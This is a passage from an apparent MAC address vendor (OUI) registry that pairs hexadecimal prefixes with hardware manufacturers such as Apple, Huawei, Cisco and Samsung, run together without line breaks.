Inc. 8C79F5 Samsung Electronics Co.,Ltd 48F8DB HUAWEI TECHNOLOGIES CO.,LTD 00122A VTech Telecommunications Ltd. B0518E Holl technology CO.Ltd. 2852E0 Layon international Electronic & Telecom Co.,Ltd 58CB52 Google, Inc. 7C6166 Amazon Technologies Inc. 989BCB AVM Audiovisuelles Marketing und Computersysteme GmbH 94F7AD Juniper Networks 6063F9 Ciholas, Inc. AC8FF8 Nokia 6003A6 Inteno Broadband Technology AB 7C5259 Sichuan Jiuzhou Electronic Technology Co., Ltd. 44B295 Sichuan AI-Link Technology Co., Ltd. 9424E1 Alcatel-Lucent Enterprise F8CA59 NetComm Wireless 88B291 Apple, Inc. C42AD0 Apple, Inc. CCD281 Apple, Inc. 200DB0 Shenzhen Four Seas Global Link Network Technology Co., Ltd. D81EDD GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D43FCB ARRIS Group, Inc. 5C7695 Technicolor CH USA Inc. F84D33 Fiberhome Telecommunication Technologies Co.,LTD C08ACD Guangzhou Shiyuan Electronic Technology Company Limited ACF6F7 LG Electronics (Mobile Communications) E89E0C Private 48E6C0 SIMCom Wireless Solutions Co.,Ltd. 383C9C Fujian Newland Payment Technology Co.,Ltd. C02E25 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 107717 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD A86D5F Raisecom Technology CO., LTD 58ECED Integrated Device Technology (Malaysia) Sdn. Bhd. A468BC Private 005079 Private 100C6B NETGEAR 505FB5 Askey Computer Corp. C4F0EC Fiberhome Telecommunication Technologies Co.,LTD E80FC8 Universal Electronics, Inc. E45D37 Juniper Networks 00EEAB Cisco Systems, Inc 54A703 TP-LINK TECHNOLOGIES CO.,LTD. 907A58 Zegna-Daidong Limited E009BF SHENZHEN TONG BO WEI TECHNOLOGY Co.,LTD 00131E peiker acustic GmbH 846991 Nokia 001BF7 Lund IP Products AB 783607 Cermate Technologies Inc. B00073 Wistron Neweb Corporation D88DC8 Atil Technology Co., LTD 88DE7C Askey Computer Corp. A8E2C1 Texas Instruments 909A77 Texas Instruments 04EE03 Texas Instruments 4C2498 Texas Instruments 7CD95C Google, Inc. C8AACC Private 002167 HWA JIN T&I Corp. 000B86 Aruba, a Hewlett Packard Enterprise Company DC31D1 vivo Mobile Communication Co., Ltd. C8F750 Dell Inc. D49234 NEC Corporation 0007CB FREEBOX SAS 149FB6 GUANGDONG GENIUS TECHNOLOGY CO., LTD. 00115A Ivoclar Vivadent AG 4CAEA3 Hewlett Packard Enterprise 1C2E1B Suzhou Tremenet Communication Technology Co., Ltd. 1C24EB Burlywood 001013 Kontron America, Inc. 2C2BF9 LG Innotek D8C7C8 Aruba, a Hewlett Packard Enterprise Company 703A0E Aruba, a Hewlett Packard Enterprise Company 204C03 Aruba, a Hewlett Packard Enterprise Company 58C6F0 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 84A06E Sagemcom Broadband SAS A43EA0 iComm HK LIMITED 64C2DE LG Electronics (Mobile Communications) 8C444F HUMAX Co., Ltd. 006762 Fiberhome Telecommunication Technologies Co.,LTD 2CC407 machineQ B4ED19 Pie Digital, Inc. 40DF02 LINE BIZ Plus CCE194 Juniper Networks 900218 BSkyB Ltd 144E2A Ciena Corporation 84139F zte corporation F051EA Fitbit, Inc. 5033F0 YICHEN (SHENZHEN) TECHNOLOGY CO.LTD FC2BB2 Actiontec Electronics, Inc E09F2A Iton Technology Corp. 4CE19E TECNO MOBILE LIMITED 7495EC ALPS ELECTRIC CO., LTD. AC5AEE China Mobile Group Device Co.,Ltd. 70BC10 Microsoft Corporation 884A18 Opulinks 0006F7 ALPS ELECTRIC CO., LTD. 000704 ALPS ELECTRIC CO., LTD. 0006F5 ALPS ELECTRIC CO., LTD. 34C731 ALPS ELECTRIC CO., LTD. 9C69B4 IEEE Registration Authority 500084 Siemens Canada 64D4BD ALPS ELECTRIC CO., LTD. 0498F3 ALPS ELECTRIC CO., LTD. 00214F ALPS ELECTRIC CO., LTD. 44B433 tide.co.,ltd D8A6FD Ghost Locomotion DC21B9 Sentec Co.Ltd 6CDFFB IEEE Registration Authority 247D4D Texas Instruments 8850F6 Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd E498BB Phyplus Microelectronics Limited 60A11E Wuhan Maxsine Electric Co.,Ltd. C45BF7 ants 8CDF9D NEC Corporation 5C415A Amazon.com, LLC 705E55 Realme Chongqing MobileTelecommunications Corp Ltd B0D568 Shenzhen Cultraview Digital Technology Co., Ltd F00EBF ZettaHash Inc. 703509 Cisco Systems, Inc 441AFA New H3C Technologies Co., Ltd 04072E VTech Electronics Ltd. 780ED1 TRUMPF Werkzeugmaschinen GmbH+Co.KG 44ECCE Juniper Networks F82F08 Molex CMS 441C12 Technicolor CH USA Inc. 4428A3 Jiangsu fulianCommunication Technology Co., Ltd. 10C595 Lenovo 203233 SHENZHEN BILIAN ELECTRONIC CO.,LTD 6829DC Ficosa Electronics S.L.U. 9454DF YST CORP. 7CBC84 IEEE Registration Authority F80DF1 Sontex SA A49426 Elgama-Elektronika Ltd. E4F14C Private A8B456 Cisco Systems, Inc 2CA9F0 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 549B72 Ericsson AB A047D7 Best IT World (India) Pvt Ltd 6899CD Cisco Systems, Inc 1040F3 Apple, Inc. 586B14 Apple, Inc. BCB863 Apple, Inc. 2C1CF6 Alien Green LLC 6C2B59 Dell Inc. 44E66E Apple, Inc. C0E862 Apple, Inc. F40616 Apple, Inc. 0CFE5D IEEE Registration Authority 3C8D20 Google, Inc. 601D91 Motorola Mobility LLC, a Lenovo Company D4C94B Motorola Mobility LLC, a Lenovo Company 08351B Shenzhen Jialihua Electronic Technology Co., Ltd AC1585 silergy corp AC5093 Magna Electronics Europe GmbH & Co. OHG 70BBE9 Xiaomi Communications Co Ltd 50A0A4 Nokia 00D02D Resideo 806940 LEXAR CO.,LIMITED 64F81C Huawei Technologies Co., Ltd. 1098C3 Murata Manufacturing Co., Ltd. 9CC8FC ARRIS Group, Inc. B07E11 Texas Instruments 10C753 Qingdao Intelligent&Precise Electronics Co.,Ltd. F4951B Hefei Radio Communication Technology Co., Ltd 6C3845 Fiberhome Telecommunication Technologies Co.,LTD 2C6104 SHENZHEN FENGLIAN TECHNOLOGY CO., LTD. BC9325 Ningbo Joyson Preh Car Connect Co.,Ltd. D0B60A Xingluo Technology CompanyLimited 049226 ASUSTek COMPUTER INC. E8ADA6 Sagemcom Broadband SAS 0C1C19 LONGCONN ELECTRONICS(SHENZHEN) CO.,LTD 90E710 New H3C Technologies Co., Ltd 302952 Hillstone Networks Inc E013B5 vivo Mobile Communication Co., Ltd. E0795E Wuxi Xiaohu Technology Co.,Ltd. 00B1E3 Cisco Systems, Inc A41194 Lenovo 00CB00 Private DCF401 Dell Inc. 0C4101 Ruichi Auto Technology (Guangzhou) Co., Ltd. 00B771 Cisco Systems, Inc E4B2FB Apple, Inc. 2CCA0C WITHUS PLANET 84326F GUANGZHOU AVA ELECTRONICS TECHNOLOGY CO.,LTD C89C13 Inspiremobile 8C85E6 Cleondris GmbH 807D14 HUAWEI TECHNOLOGIES CO.,LTD 20283E HUAWEI TECHNOLOGIES CO.,LTD A4FC77 Mega Well Limited 4C569D Apple, Inc. 38539C Apple, Inc. 402619 Apple, Inc. 6CE85C Apple, Inc. 049162 Microchip Technology Inc. F83880 Apple, Inc. 2C79D7 Sagemcom Broadband SAS 00B4F5 DongGuan Siyoto Electronics Co., Ltd BC3F4E Teleepoch Ltd 1838AE CONSPIN SOLUTION 04CF8C XIAOMI Electronics,CO.,LTD 0C7512 Shenzhen Kunlun TongTai TechnologyCo.,Ltd. 7483C2 Ubiquiti Networks Inc. E063DA Ubiquiti Networks Inc. 50579C Seiko Epson Corporation 54278D NXP (China) Management Ltd. B0BE76 TP-LINK TECHNOLOGIES CO.,LTD. 4447CC Hangzhou Hikvision Digital Technology Co.,Ltd. 4CD98F Dell Inc. B0AE25 Varikorea 4C1B86 Arcadyan Corporation ECC40D Nintendo Co.,Ltd 440049 Amazon Technologies Inc. E86A64 LCFC(HeFei) Electronics Technology co., ltd 10A24E GOLD3LINK ELECTRONICS CO., LTD CCC5E5 Dell Inc. 6CC374 Texas Instruments 684749 Texas Instruments F8D9B8 Open Mesh, Inc. 7C696B Atmosic Technologies 5CD20B Yytek Co., Ltd. 70037E Technicolor CH USA Inc. D003DF Samsung Electronics Co.,Ltd C423A2 PT. Emsonic Indonesia B4CB57 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 4C1265 ARRIS Group, Inc. 00500C e-Tek Labs, Inc. 485F99 Cloud Network Technology (Samoa) Limited 8834FE Bosch Automotive Products (Suzhou) Co. Ltd 88F7BF vivo Mobile Communication Co., Ltd. D87D7F Sagemcom Broadband SAS 00051A 3COM EUROPE LTD 08004E 3COM EUROPE LTD 00301E 3COM EUROPE LTD 005004 3COM 000103 3COM 58B568 SECURITAS DIRECT ESPAÑA, SAU 484AE9 Hewlett Packard Enterprise 846A66 Sumitomo KizaiCo.,Ltd. 18D717 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 80B624 IVS DCF505 AzureWave Technology Inc. CCF0FD China Mobile (Hangzhou) Information Technology Co., Ltd. 8489EC IEEE Registration Authority 88108F HUAWEI TECHNOLOGIES CO.,LTD F4631F HUAWEI TECHNOLOGIES CO.,LTD A49B4F HUAWEI TECHNOLOGIES CO.,LTD 00073A INVENTEL 00266C INVENTEC CORPORATION 008CFA INVENTEC CORPORATION 5CFB7C Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd FC039F Samsung Electronics Co.,Ltd 02C08C 3COM 0057C1 LG Electronics (Mobile Communications) 7C240C Telechips, Inc. 00203D Honeywell Environmental & Combustion Controls 004084 Honeywell International HPS A4D990 Samsung Electronics Co.,Ltd 006087 KANSAI ELECTRIC CO., LTD. DCF719 Cisco Systems, Inc A0950C China Mobile IOT Company Limited D4741B Beijing HuaDa ZhiBao Electronic System Co.,Ltd. 001BC0 Juniper Networks 2C15E1 Phicomm (Shanghai) Co., Ltd. 30D16B Liteon Technology Corporation 98AE71 VVDN Technologies Pvt Ltd A456CC Technicolor CH USA Inc. AC6E1A SHENZHEN GONGJIN ELECTRONICS CO.,LT 0080EB COMPCONTROL B.V. 0002EB Pico Communications 342EB6 HUAWEI TECHNOLOGIES CO.,LTD AC9232 HUAWEI TECHNOLOGIES CO.,LTD 000FB0 Compal Electronics INC. 00023F Compal Electronics INC. 68A8E1 Wacom Co.,Ltd. 30D32D devolo AG BCF2AF devolo AG E0AF4F Deutsche Telekom AG B869F4 Routerboard.com 283A4D Cloud Network Technology (Samoa) Limited B87C6F NXP (China) Management Ltd. 305DA6 ADVALY SYSTEM Inc. BC30D9 Arcadyan Corporation 0479B7 Texas Instruments C0D0FF China Mobile IOT Company Limited 88DF9E New H3C Technologies Co., Ltd 2C7CE4 Wuhan Tianyu Information Industry Co., Ltd. 5803FB Hangzhou Hikvision Digital Technology Co.,Ltd. 144802 THE YEOLRIM Co.,Ltd. 40313C XIAOMI Electronics,CO.,LTD FC4596 COMPAL INFORMATION (KUNSHAN) CO., LTD. A0E534 Stratec Biomedical AG 444B5D GE Healthcare 001555 DFM GmbH 1C7508 COMPAL INFORMATION (KUNSHAN) CO., LTD. 001B38 COMPAL INFORMATION (KUNSHAN) CO., LTD. 00235A COMPAL INFORMATION (KUNSHAN) CO., LTD. 24D76B Syntronic AB C4FEE2 AMICCOM Electronics Corporation 780CF0 Cisco Systems, Inc 0C8C24 SHENZHEN BILIAN ELECTRONIC CO.,LTD 8C6D77 HUAWEI TECHNOLOGIES CO.,LTD E8C57A Ufispace Co., LTD. E01283Shenzhen Fanzhuo Communication Technology Co., Lt A0CF5B Cisco Systems, Inc 002421 MICRO-STAR INT'L CO., LTD. 0060D1 CASCADE COMMUNICATIONS 84C9C6 SHENZHEN GONGJIN ELECTRONICS CO.,LT 88B66B easynetworks 24F57E HWH CO., LTD. 8CA048 Beijing NeTopChip Technology Co.,LTD 24D3F2 zte corporation D469A5 Miura Systems Ltd. 8C8126 ARCOM D47C44 IEEE Registration Authority 805E4F FN-LINK TECHNOLOGY LIMITED 8417EF Technicolor CH USA Inc. 3856B5 Peerbridge Health Inc 7C96D2 Fihonest communication co.,Ltd C042D0 Juniper Networks D0C5D8 LATECOERE 7054B4 Vestel Elektronik San ve Tic. A.Åž. 20A60C Xiaomi Communications Co Ltd 488AD2 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. DCE838 CK Telecom (Shenzhen) Limited A8D498 Avira Operations GmbH & Co. KG 505967 Intent Solutions Inc 000680 Card Access, Inc. 3C576C Samsung Electronics Co.,Ltd 841766 WEIFANG GOERTEK ELECTRONICS CO.,LTD 2C4D79 WEIFANG GOERTEK ELECTRONICS CO.,LTD 000C42 Routerboard.com 0026BD JTEC Card & Communication Co., Ltd 60D02C Ruckus Wireless D058FC BSkyB Ltd 14579F HUAWEI TECHNOLOGIES CO.,LTD B44326 HUAWEI TECHNOLOGIES CO.,LTD 78D294 NETGEAR 709FA9 TECNO MOBILE LIMITED 0C01DB Infinix mobility limited 08C5E1 SAMSUNG ELECTRO-MECHANICS(THAILAND) 1866C7 Shenzhen Libre Technology Co., Ltd 5CB3F6 Human, Incorporated 2C4835 IEEE Registration Authority 482AE3 Wistron InfoComm(Kunshan)Co.,Ltd. FCA6CD Fiberhome Telecommunication Technologies Co.,LTD 44C874 China Mobile Group Device Co.,Ltd. 74C14F HUAWEI TECHNOLOGIES CO.,LTD B0EB57 HUAWEI TECHNOLOGIES CO.,LTD 1869DA China Mobile Group Device Co.,Ltd. F85C4D Nokia 2C584F ARRIS Group, Inc. F04B3A Juniper Networks 54BF64 Dell Inc. A85B6C Robert Bosch Gmbh, CM-CI2 C8B1EE Qorvo 00FCBA Cisco Systems, Inc 00CBB4 SHENZHEN ATEKO PHOTOELECTRICITY CO.,LTD 4CC00A vivo Mobile Communication Co., Ltd. 9CE82B vivo Mobile Communication Co., Ltd. 7079B3 Cisco Systems, Inc D818D3 Juniper Networks 149B2F JiangSu ZhongXie Intelligent Technology co., LTD 3835FB Sagemcom Broadband SAS 48DD9D ITEL MOBILE LIMITED A075EA BoxLock, Inc. F04CD5 Maxlinear, Inc 0001AE Trex Enterprises 00E009 Stratus Technologies E4EA83 SHENZHEN GONGJIN ELECTRONICS CO.,LT 74EC42 Fiberhome Telecommunication Technologies Co.,LTD D4FC13 Fiberhome Telecommunication Technologies Co.,LTD 807D3A Espressif Inc. ECAF97 GIT A0B045 Halong Mining E0BAB4 Arrcus, Inc 589B0B Shineway Technologies, Inc. D8160A Nippon Electro-Sensory Devices 10C07C Blu-ray Disc Association 40A677 Juniper Networks E4B021 Samsung Electronics Co.,Ltd 9C7F57 UNIC Memory Technology Co Ltd B4E01D CONCEPTION ELECTRONIQUE 1C0042 NARI Technology Co., Ltd. 4434A7 ARRIS Group, Inc. 3CE1A1 Universal Global Scientific Industrial Co., Ltd. F898EF HUAWEI TECHNOLOGIES CO.,LTD 58F987 HUAWEI TECHNOLOGIES CO.,LTD A8F5AC HUAWEI TECHNOLOGIES CO.,LTD 58BAD4 HUAWEI TECHNOLOGIES CO.,LTD 701D08 99IOT Shenzhen co.,ltd 7412BB Fiberhome Telecommunication Technologies Co.,LTD 001027 L-3 COMMUNICATIONS EAST BC2643 Elprotronic Inc. 04E229 Qingdao Haier Technology Co.,Ltd 348B75 LAVA INTERNATIONAL(H.K) LIMITED 9CE895 New H3C Technologies Co., Ltd 00583F PC Aquarius 903D68 G-Printec, Inc. 1094BB Apple, Inc. 781D4A zte corporation 94E1AC Hangzhou Hikvision Digital Technology Co.,Ltd. 34E894 TP-LINK TECHNOLOGIES CO.,LTD. F86FC1 Apple, Inc. 28FF3C Apple, Inc. F099B6 Apple, Inc. 88E9FE Apple, Inc. 38892C Apple, Inc. 749EAF Apple, Inc. 94BF2D Apple, Inc. 68CAE4 Cisco Systems, Inc 00BE3B HUAWEI TECHNOLOGIES CO.,LTD 7CA177 HUAWEI TECHNOLOGIES CO.,LTD 242E02 HUAWEI TECHNOLOGIES CO.,LTD 78B6EC Scuf Gaming International LLC 8035C1 Xiaomi Communications Co Ltd 58B3FC SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 2047DA Xiaomi Communications Co Ltd 2429FE KYOCERA Corporation 7C49EB XIAOMI Electronics,CO.,LTD C43306 China Mobile Group Device Co.,Ltd. 08DFCB Systrome Networks A4933F HUAWEI TECHNOLOGIES CO.,LTD 28AC9E Cisco Systems, Inc 2CB8ED SonicWall 68D482 SHENZHEN GONGJIN ELECTRONICS CO.,LT 984562 Shanghai Baud Data Communication Co.,Ltd. E4C483 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 001FBA Boyoung Tech A433D7 MitraStar Technology Corp. B0ACD2 zte corporation 200F70 FOXTECH 202D23 Collinear Networks Inc. 90834B BEIJING YUNYI TIMES TECHNOLOGY CO,.LTD 18502A SOARNEX A8367A frogblue TECHNOLOGY GmbH 6CE4DA NEC Platforms, Ltd. 10E7C6 Hewlett Packard 1831BF ASUSTek COMPUTER INC. C8FAE1 ARQ Digital LLC DCA333 Shenzhen YOUHUA Technology Co., Ltd 788C54 Ping Communication B8AF67 Hewlett Packard C098DA China Mobile IOT Company Limited F00FEC HUAWEI TECHNOLOGIES CO.,LTD AC075F HUAWEI TECHNOLOGIES CO.,LTD C048E6 Samsung Electronics Co.,Ltd 882E5A storONE 007147 Amazon Technologies Inc. 00BE75 Cisco Systems, Inc 64DB8B Hangzhou Hikvision Digital Technology Co.,Ltd. 78257A LEO Innovation Lab 10A4B9 Baidu Online Network Technology (Beijing) Co., Ltd 501CB0 Cisco Systems, Inc 04AC44 Holtek Semiconductor Inc. F4DCA5 DAWON DNS 80CE62 Hewlett Packard 801F12 Microchip Technology Inc. 506CBE InnosiliconTechnology Ltd 247E12 Cisco Systems, Inc 04C241 Nokia 3C479B Theissen Training Systems, Inc. 606BFF Nintendo Co.,Ltd 8CF710 AMPAK Technology, Inc. 307BAC New H3C Technologies Co., Ltd 785DC8 LG Electronics 3C0461 ARRIS Group, Inc. 883D24 Google, Inc. E8C1B8Nanjing Bangzhong Electronic Commerce Limited D8D775 Sagemcom Broadband SAS E8330D Xaptec GmbH D460E3 Sercomm Corporation. B4A8B9 Cisco Systems, Inc 50DCE7 Amazon Technologies Inc. 649829 Integrated Device Technology (Malaysia) Sdn. Bhd. 081DC4 Thermo Fisher Scientific Messtechnik GmbH 785364 SHIFT GmbH 38E60A Xiaomi Communications Co Ltd 40CBC0 Apple, Inc. C4618B Apple, Inc. CC6EA4 Samsung Electronics Co.,Ltd 803A59 AT&T 588D64 Xi'an Clevbee Technology Co.,Ltd 005D73 Cisco Systems, Inc 606D3C Luxshare Precision Industry Company Limited 44F034 Kaonmedia CO., LTD. 002790 Cisco Systems, Inc 34BA38 PAL MOHAN ELECTRONICS PVT LTD 9829A6 COMPAL INFORMATION (KUNSHAN) CO., LTD. CC4D38 Carnegie Technologies 08E689 Apple, Inc. DC56E7 Apple, Inc. A816D0 Samsung Electronics Co.,Ltd A46CF1 Samsung Electronics Co.,Ltd 08AED6 Samsung Electronics Co.,Ltd DCBFE9 Motorola Mobility LLC, a Lenovo Company B42D56 Extreme Networks, Inc. 4064A4 THE FURUKAWA ELECTRIC CO., LTD 6CB2AE Cisco Systems, Inc B0982B Sagemcom Broadband SAS 34FA9F Ruckus Wireless F065C2 Yanfeng Visteon Electronics Technology (Shanghai) Co.,Ltd. 70B7E2 Jiangsu Miter Technology Co.,Ltd. 808DB7 Hewlett Packard Enterprise A09D86 Alcatel-Lucent Shanghai Bell Co., Ltd 00C0FF Seagate Cloud Systems Inc D45DDF PEGATRON CORPORATION F8B568 IEEE Registration Authority 2C6B7D Texas Instruments 88D171 BEGHELLI S.P.A A09DC1 China Dragon Technology Limited 2C4205 Lytx A825EB Cambridge Industries(Group) Co.,Ltd. 34E380 Genexis B.V. 5C5819 Jingsheng Technology Co., Ltd. B8CA04 Holtek Semiconductor Inc. C4C563 TECNO MOBILE LIMITED 80B708 Blue Danube Systems, Inc 08BC20 Hangzhou Royal Cloud Technology Co., Ltd 942A3F Diversey Inc 2031EB HDSN F8C96C Fiberhome Telecommunication Technologies Co.,LTD 844823 WOXTER TECHNOLOGY Co. Ltd F41E5E RtBrick Inc. 6C7660 KYOCERA CORPORATION 002102 UpdateLogic Inc. 505800 WyTec International, Inc. C8D12A Comtrend Corporation 0CEAC9 ARRIS Group, Inc. E82A44 Liteon Technology Corporation 10A4BE SHENZHEN BILIAN ELECTRONIC CO.,LTD 947BBE Ubicquia ECC06A PowerChord Group Limited 944996 WiSilica Inc F81D0F Hitron Technologies. Inc 58C935 Chiun Mai Communication Systems, Inc 0094A1 F5 Networks, Inc. BCF292 PLANTRONICS, INC. 0450DA Qiku Internet Network Scientific (Shenzhen) Co., Ltd E820E2 HUMAX Co., Ltd. 0026A8 DAEHAP HYPER-TECH 785C28 Prime Motion Inc. 8C5BF0 ARRIS Group, Inc. 1890D8 Sagemcom Broadband SAS 88835D FN-LINK TECHNOLOGY LIMITED EC9F0D IEEE Registration Authority E078A3 Shanghai Winner Information Technology Co.,Inc 0005A7 HYPERCHIP Inc. 088466 Novartis Pharma AG 309FFB Ardomus Networks Corporation 282373 Digita 649A08 Shenzhen SuperElectron Technology Co.,LTD 68A682 Shenzhen YOUHUA Technology Co., Ltd 587A62 Texas Instruments 547A52 CTE International srl F06E0B Microsoft Corporation 346FED Enovation Controls 5433CB Apple, Inc. 3408BC Apple, Inc. 1C36BB Apple, Inc. 3C2EFF Apple, Inc. 00E025 dit Co., Ltd. AC84C6 TP-LINK TECHNOLOGIES CO.,LTD. 001530 Dell EMC 0CB2B7 Texas Instruments 24F677 Apple, Inc. B0CA68 Apple, Inc. C83C85 Apple, Inc. 78870D Unifiedgateways India Private Limited A88200 Hisense Electric Co.,Ltd 3820A8 ColorTokens, Inc. 705896 InShow Technology 000589 National Datacomputer 3CA616 vivo Mobile Communication Co., Ltd. 9CE063 Samsung Electronics Co.,Ltd D03169 Samsung Electronics Co.,Ltd 24F27F Hewlett Packard Enterprise BC0543 AVM GmbH 00B69F Latch 842C80 Sichuan Changhong Electric Ltd. 3CC079 Shenzhen One-Nine Intelligent Electronic Science and Technology Co., Ltd 98C5DB Ericsson AB 149F3C Samsung Electronics Co.,Ltd FCEEE6 FORMIKE ELECTRONIC CO., LTD 84E327 TAILYN TECHNOLOGIES INC 0021B8 Inphi Corporation 0C9160 Hui Zhou Gaoshengda Technology Co.,LTD D8ED1C Magna Technology SL D83134 Roku, Inc 408BF6 Shenzhen TCL New Technology Co., Ltd 00006B Silicon Graphics 74373B UNINET Co.,Ltd. 7C6456 Samsung Electronics Co.,Ltd F46E24 NEC Personal Computers, Ltd. 888279 Shenzhen RB-LINK Intelligent Technology Co.Ltd 68C63A Espressif Inc. A0648F ASKEY COMPUTER CORP C850E9 Raisecom Technology CO., LTD 10F163 TNK CO.,LTD 88DA1A Redpine Signals, Inc. 98EF9B OHSUNG 14CF8D OHSUNG 104400 HUAWEI TECHNOLOGIES CO.,LTD B0E17E HUAWEI TECHNOLOGIES CO.,LTD E4A7C5 HUAWEI TECHNOLOGIES CO.,LTD 5C8D2D Shanghai Wellpay Information Technology Co., Ltd 90FD9F Silicon Laboratories B430C0 York Instruments Ltd E81DA8 Ruckus Wireless F03D03 TECNO MOBILE LIMITED DCF090 Nubia Technology Co.,Ltd. A0FE61 Vivint Wireless Inc. 5C2BF5 Vivint Wireless Inc. CC5A53 Cisco Systems, Inc 006088 Analog Devices, Inc. 084ACF GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 2C279E IEEE Registration Authority 8C5F48 Continental Intelligent Transportation Systems LLC 947EB9 National Narrowband Network Communications Pty Ltd 646E69 Liteon Technology Corporation 706BB9 Cisco Systems, Inc D4389C Sony Mobile Communications Inc 00C0EE KYOCERA Display Corporation 245FDF KYOCERA CORPORATION 9C63ED zte corporation 74F661 Schneider Electric Fire & Security Oy B8634D Apple, Inc. 24C42F Philips Lifeline 2CB21A Phicomm (Shanghai) Co., Ltd. A4E975 Apple, Inc. 3035AD Apple, Inc. 844167 Apple, Inc. 9800C6 Apple, Inc. AC1F74 Apple, Inc. A85C2C Apple, Inc. 00DB70 Apple, Inc. FCE557 Nokia Corporation 48C58D Lear Corporation GmbH 00289F Semptian Co., Ltd. 9C305B Hon Hai Precision Ind. Co.,Ltd. 104E89 Garmin International D8C497 Quanta Computer Inc. BCC342 Panasonic Communications Co., Ltd. 001BD3 Panasonic Corporation AVC Networks Company CC7EE7 Panasonic Corporation AVC Networks Company 20C6EB Panasonic Corporation AVC Networks Company 64B5C6 Nintendo Co.,Ltd 2830AC Frontiir Co. Ltd. D4D2E5 BKAV Corporation 0050B5 FICHET SECURITE ELECTRONIQUE 001439 Blonder Tongue Laboratories, Inc 20A6CD Hewlett Packard Enterprise 84802D Cisco Systems, Inc 001987 Panasonic Mobile Communications Co.,Ltd. 741C27 ITEL MOBILE LIMITED 00A0AC GILAT SATELLITE NETWORKS, LTD. 002609 Phyllis Co., Ltd. 28F537 IEEE Registration Authority 94D9B3 TP-LINK TECHNOLOGIES CO.,LTD. C84029 Fiberhome Telecommunication Technologies Co.,LTD F86EEE HUAWEI TECHNOLOGIES CO.,LTD 7802B1 Cisco Systems, Inc B40F3B Tenda Technology Co.,Ltd.Dongguan branch 00188D Nokia Danmark A/S 0015AB PRO CO SOUND INC 5876C5 DIGI I'S LTD A8B2DA FUJITSU LIMITED 001354 Zcomax Technologies, Inc. 78D800 IEEE Registration Authority 0835B2 CoreEdge Networks Co., Ltd 4C49E3 Xiaomi Communications Co Ltd 245880 VIZEO 54666C Shenzhen YOUHUA Technology Co., Ltd A89675 Motorola Mobility LLC, a Lenovo Company 389AF6 Samsung Electronics Co.,Ltd E0AA96 Samsung Electronics Co.,Ltd 507705 Samsung Electronics Co.,Ltd 28D436 Jiangsu dewosi electric co., LTD D4B27A ARRIS Group, Inc. 44EA4B Actlas Inc. C4CB6B Airista Flow, Inc. 188090 Cisco Systems, Inc 786256 HUAWEI TECHNOLOGIES CO.,LTD B05508 HUAWEI TECHNOLOGIES CO.,LTD B875C0 PayPal, Inc. 001C71 Emergent Electronics 001A93 ERCO Leuchten GmbH 94F665 Ruckus Wireless B090D4 Shenzhen Hoin Internet Technology Co., Ltd C0BAE6 Application Solutions (Electronics and Vision) Ltd 8C9F3B Qingdao Hisense Communications Co.,Ltd. 0014B8 Hill-Rom ACED5C Intel Corporate 842096 SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. B4C170 Yi chip Microelectronics (Hangzhou) Co., Ltd AC6706 Ruckus Wireless 044FAA Ruckus Wireless 589396 Ruckus Wireless 001F41 Ruckus Wireless C4108A Ruckus Wireless F0B052 Ruckus Wireless 70DF2F Cisco Systems, Inc 3894E0 Syrotech Networks. Ltd. 34F64B Intel Corporate F46BEF Sagemcom Broadband SAS 10CDB6 Essential Products, Inc. A4F3E7 Integrated Device Technology (Malaysia) Sdn. Bhd. E43A6E Shenzhen Zeroone Technology CO.,LTD 7CE2CA Juniper Networks 9061AE Intel Corporate 6CF9D2 CHENGDU POVODO ELECTRONIC TECHNOLOGY CO., LTD 30B62DMojo Networks, Inc. 50184C Platina Systems Inc. F4B7B3 vivo Mobile Communication Co., Ltd. CC03D9 Cisco Meraki FCA667 Amazon Technologies Inc. C81FEA Avaya Inc 0027E3 Cisco Systems, Inc 0018AE TVT CO.,LTD 8891DD Racktivity 1C4593 Texas Instruments 90EC50 C.O.B.O. SPA E0D848 Dell Inc. 60271C VIDEOR E. Hartig GmbH 00EC0A Xiaomi Communications Co Ltd C8D7B0 Samsung Electronics Co.,Ltd 6C60EB ZHI YUAN ELECTRONICS CO., LIMITED 74DADA D-Link International D8F1F0 Pepxim International Limited DCC8F5 Shanghai UMEinfo CO.,LTD. 88D7F6 ASUSTek COMPUTER INC. 9097F3 Samsung Electronics Co.,Ltd 7C1C68 Samsung Electronics Co.,Ltd C087EB Samsung Electronics Co.,Ltd 04714B IEEE Registration Authority 2C41A1 Bose Corporation 4C38D8 ARRIS Group, Inc. 447BBB Shenzhen YOUHUA Technology Co., Ltd 9C7BD2 NEOLAB Convergence D0F88C Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 2CB115 Integrated Device Technology (Malaysia) Sdn. Bhd. 10D07A AMPAK Technology, Inc. D4C1C8 zte corporation 88D274 zte corporation 002449 Shen Zhen Lite Star Electronics Technology Co., Ltd 00E18C Intel Corporate 847933 profichip GmbH 881544 Cisco Meraki C4ABB2 vivo Mobile Communication Co., Ltd. 80B234 Technicolor CH USA Inc. 44B412 SIUS AG 0CB912 JM-DATA GmbH 3CA308 Texas Instruments F43E61 SHENZHEN GONGJIN ELECTRONICS CO.,LT B4417A SHENZHEN GONGJIN ELECTRONICS CO.,LT 185207 SICHUAN TIANYI COMHEART TELECOMCO., LTD 000062 BULL HN INFORMATION SYSTEMS E8C1D7 Philips 4C8120 Taicang T&W Electronics 28A6DB HUAWEI TECHNOLOGIES CO.,LTD 14A0F8 HUAWEI TECHNOLOGIES CO.,LTD C8F86D Alcatel-Lucent Shanghai Bell Co., Ltd 6045CB ASUSTek COMPUTER INC. 00118B Alcatel-Lucent Enterprise 00E0B1 Alcatel-Lucent Enterprise 00E0DA Alcatel-Lucent Enterprise F8BE0D A2UICT Co.,Ltd. E442A6 Intel Corporate 3C678C HUAWEI TECHNOLOGIES CO.,LTD D4503F GUANGDONG 